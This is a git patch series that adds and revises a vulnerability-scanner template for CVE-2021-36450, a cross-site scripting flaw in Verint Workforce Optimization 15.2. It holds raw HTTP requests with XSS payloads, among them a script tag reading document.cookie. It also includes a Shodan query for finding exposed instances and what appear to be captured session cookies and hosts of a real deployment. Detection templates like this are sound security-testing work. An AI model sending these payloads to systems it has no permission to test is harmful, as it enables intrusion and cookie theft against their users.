From def429e92767dd1fa1e2f27079b0605908d81dda Mon Sep 17 00:00:00 2001 From: atomic <75549184+atomiczsec@users.noreply.github.com> Date: Wed, 13 Jul 2022 22:37:09 -0400 Subject: [PATCH 1/3] Add CVE-2021-36450.yaml --- cves/2021/CVE-2021-36450.yaml | 51 +++++++++++++++++++++++++++++++++++ 1 file changed, 51 insertions(+) create mode 100644 cves/2021/CVE-2021-36450.yaml diff --git a/cves/2021/CVE-2021-36450.yaml b/cves/2021/CVE-2021-36450.yaml new file mode 100644 index 0000000000..d9b19ac6da --- /dev/null +++ b/cves/2021/CVE-2021-36450.yaml @@ -0,0 +1,51 @@ +id: CVE-2021-36450 + +info: + name: Verint 15.2 XSS + author: atomiczsec + severity: medium + description: F Verint 15.2 (15.2.8.10048) Cross Site Scripting (XSS) + reference: + - https://medium.com/@1nf0sk/cve-2021-36450-cross-site-scripting-xss-6f5d8d7db740 + - https://sushantvkamble.blogspot.com/2021/11/cross-site-scripting-xss.html + metadata: + shodan-query: title:"Verint Sign-in" + classification: + cvss-metrics: AV:N/AC:M/Au:N/C:N/I:P/A:N + cvss-score: 4.3 + cve-id: CVE-2021-36450 + cwe-id: CWE-79 + + tags: cve,cve2021,xss +requests: + - raw: + - |- + POST /wfo/control/signin?rd=%2Fwfo%2Fcontrol%2Fmy_notifications%3FNEWUINAV%3D%22%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E%26 HTTP/1.1 + Host: {{Hostname}} + Cookie: BIGipServer~WFO~WFO_VERINTAPP_HTTPS=1008015114.47873.0000; TS019568ef=012ae9fa175730d8c6833bc61a72737e509d8e4e11353b3e5616f302159403288a8010f798cf861e68949a5e2ab28fa9e5cabe247e; JSESSIONID=6j_0IpQrt2_52N1gIC6eGXNeMrla5evPz-az1EdLYZJI1XrS3NSg!-1403817999 + Content-Length: 155 + Cache-Control: max-age=0 + Sec-Ch-Ua: "(Not(A:Brand";v="8", "Chromium";v="100" + Sec-Ch-Ua-Mobile: ?0 + Sec-Ch-Ua-Platform: "Windows" + Upgrade-Insecure-Requests: 1 + Origin: https://verint11.five9-wfo.com + Content-Type: application/x-www-form-urlencoded + User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36 + Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 + Sec-Fetch-Site: same-origin + Sec-Fetch-Mode: navigate + Sec-Fetch-User: ?1 + Sec-Fetch-Dest: document + Referer: https://verint11.five9-wfo.com/wfo/control/signin?rd=%2Fwfo%2Fcontrol%2Fmy_notifications%3FNEWUINAV%3D%22%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E%26 + Accept-Encoding: gzip, deflate + Accept-Language: en-US,en;q=0.9 + Connection: close + + browserCheckEnabled=true&username=TEST&language=en_US&defaultHttpPort=-1&screenHeight=1080&screenWidth=1920&pageModelType=0&pageDirty=false&pageAction=Login + matchers-condition: and + matchers: + - type: word + part: body + words: + - class="loginUserNameText">TEST From a74f7900d9dd0cca6701dd94a98c45c9cc47bf28 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Thu, 14 Jul 2022 13:27:13 +0530 Subject: [PATCH 2/3] Update CVE-2021-36450.yaml --- cves/2021/CVE-2021-36450.yaml | 44 ++++++++++++++++++++++++----------- 1 file changed, 30 insertions(+), 14 deletions(-) diff --git a/cves/2021/CVE-2021-36450.yaml b/cves/2021/CVE-2021-36450.yaml index d9b19ac6da..50fe6a1eb7 100644 --- a/cves/2021/CVE-2021-36450.yaml +++ b/cves/2021/CVE-2021-36450.yaml @@ -1,51 +1,67 @@ id: CVE-2021-36450 info: - name: Verint 15.2 XSS + name: Verint 15.2 - Cross Site Scripting author: atomiczsec severity: medium - description: F Verint 15.2 (15.2.8.10048) Cross Site Scripting (XSS) + description: Verint Workforce Optimization (WFO) 15.2.8.10048 allows XSS via the control/my_notifications NEWUINAV parameter. reference: - https://medium.com/@1nf0sk/cve-2021-36450-cross-site-scripting-xss-6f5d8d7db740 - https://sushantvkamble.blogspot.com/2021/11/cross-site-scripting-xss.html + - https://nvd.nist.gov/vuln/detail/CVE-2021-36450 metadata: + verified: true shodan-query: title:"Verint Sign-in" classification: cvss-metrics: AV:N/AC:M/Au:N/C:N/I:P/A:N cvss-score: 4.3 cve-id: CVE-2021-36450 cwe-id: CWE-79 + tags: cve,cve2021,xss,verint - tags: cve,cve2021,xss requests: - raw: - - |- - POST /wfo/control/signin?rd=%2Fwfo%2Fcontrol%2Fmy_notifications%3FNEWUINAV%3D%22%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E%26 HTTP/1.1 + - | + GET /wfo/control/signin?rd=%2Fwfo%2Fcontrol%2Fmy_notifications%3FNEWUINAV%3D%22%3E%3Ch1%3ETest%3C%2Fh1%3E26 HTTP/1.1 Host: {{Hostname}} - Cookie: BIGipServer~WFO~WFO_VERINTAPP_HTTPS=1008015114.47873.0000; TS019568ef=012ae9fa175730d8c6833bc61a72737e509d8e4e11353b3e5616f302159403288a8010f798cf861e68949a5e2ab28fa9e5cabe247e; JSESSIONID=6j_0IpQrt2_52N1gIC6eGXNeMrla5evPz-az1EdLYZJI1XrS3NSg!-1403817999 - Content-Length: 155 + + - | + POST /wfo/control/signin?rd=%2Fwfo%2Fcontrol%2Fmy_notifications%3FNEWUINAV%3D%22%3E%3Ch1%3ETest%3Ch1%3E%26 HTTP/1.1 + Host: {{Hostname}} + Content-Length: 213 Cache-Control: max-age=0 - Sec-Ch-Ua: "(Not(A:Brand";v="8", "Chromium";v="100" + Sec-Ch-Ua: ".Not/A)Brand";v="99", "Google Chrome";v="103", "Chromium";v="103" Sec-Ch-Ua-Mobile: ?0 - Sec-Ch-Ua-Platform: "Windows" + Sec-Ch-Ua-Platform: "macOS" Upgrade-Insecure-Requests: 1 - Origin: https://verint11.five9-wfo.com + Origin: https://12.221.75.74 Content-Type: application/x-www-form-urlencoded - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36 + User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document - Referer: https://verint11.five9-wfo.com/wfo/control/signin?rd=%2Fwfo%2Fcontrol%2Fmy_notifications%3FNEWUINAV%3D%22%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E%26 + Referer: https://12.221.75.74/wfo/control/signin?rd=%2Fwfo%2Fcontrol%2Fmy_notifications%3FNEWUINAV%3D%22%3E%3Ch1%3ETest%3Ch1%3E%26 Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Connection: close - browserCheckEnabled=true&username=TEST&language=en_US&defaultHttpPort=-1&screenHeight=1080&screenWidth=1920&pageModelType=0&pageDirty=false&pageAction=Login + browserCheckEnabled=true&username=admin&language=en_US&defaultHttpPort=80&screenHeight=1080&screenWidth=1920&pageModelType=0&pageDirty=false&pageAction=Login&csrfp_login={{csrfp_login}} + + redirects: true + max-redirects: 2 + cookie-reuse: true matchers-condition: and matchers: - type: word part: body words: - - class="loginUserNameText">TEST + - '">

Test

&" class="loginUserNameText' + + extractors: + - type: regex + name: csrfp_login + group: 1 + regex: + - 'csrfp_login=([a-zA-Z0-9]+);' From d9841ece3a1f59e05f854d1f2cc2109f897e623a Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Thu, 14 Jul 2022 13:59:41 +0530 Subject: [PATCH 3/3] Update CVE-2021-36450.yaml --- cves/2021/CVE-2021-36450.yaml | 49 ++++++++++++++++------------------- 1 file changed, 22 insertions(+), 27 deletions(-) diff --git a/cves/2021/CVE-2021-36450.yaml b/cves/2021/CVE-2021-36450.yaml index 50fe6a1eb7..c63377f3c1 100644 --- a/cves/2021/CVE-2021-36450.yaml +++ b/cves/2021/CVE-2021-36450.yaml @@ -9,14 +9,14 @@ info: - https://medium.com/@1nf0sk/cve-2021-36450-cross-site-scripting-xss-6f5d8d7db740 - https://sushantvkamble.blogspot.com/2021/11/cross-site-scripting-xss.html - https://nvd.nist.gov/vuln/detail/CVE-2021-36450 - metadata: - verified: true - shodan-query: title:"Verint Sign-in" classification: cvss-metrics: AV:N/AC:M/Au:N/C:N/I:P/A:N cvss-score: 4.3 cve-id: CVE-2021-36450 cwe-id: CWE-79 + metadata: + verified: true + shodan-query: title:"Verint Sign-in" tags: cve,cve2021,xss,verint requests: @@ -28,40 +28,35 @@ requests: - | POST /wfo/control/signin?rd=%2Fwfo%2Fcontrol%2Fmy_notifications%3FNEWUINAV%3D%22%3E%3Ch1%3ETest%3Ch1%3E%26 HTTP/1.1 Host: {{Hostname}} - Content-Length: 213 - Cache-Control: max-age=0 - Sec-Ch-Ua: ".Not/A)Brand";v="99", "Google Chrome";v="103", "Chromium";v="103" - Sec-Ch-Ua-Mobile: ?0 - Sec-Ch-Ua-Platform: "macOS" - Upgrade-Insecure-Requests: 1 - Origin: https://12.221.75.74 Content-Type: application/x-www-form-urlencoded - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36 - Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 - Sec-Fetch-Site: same-origin - Sec-Fetch-Mode: navigate - Sec-Fetch-User: ?1 - Sec-Fetch-Dest: document - Referer: https://12.221.75.74/wfo/control/signin?rd=%2Fwfo%2Fcontrol%2Fmy_notifications%3FNEWUINAV%3D%22%3E%3Ch1%3ETest%3Ch1%3E%26 - Accept-Encoding: gzip, deflate - Accept-Language: en-US,en;q=0.9 - Connection: close browserCheckEnabled=true&username=admin&language=en_US&defaultHttpPort=80&screenHeight=1080&screenWidth=1920&pageModelType=0&pageDirty=false&pageAction=Login&csrfp_login={{csrfp_login}} redirects: true max-redirects: 2 cookie-reuse: true + + extractors: + - type: regex + part: header + internal: true + name: csrfp_login + group: 1 + regex: + - 'csrfp_login=([a-zA-Z0-9]+);' + matchers-condition: and matchers: - type: word part: body words: - - '">

Test

&" class="loginUserNameText' + - '">

Test

26" class="loginUserNameText' - extractors: - - type: regex - name: csrfp_login - group: 1 - regex: - - 'csrfp_login=([a-zA-Z0-9]+);' + - type: word + part: header + words: + - text/html + + - type: status + status: + - 200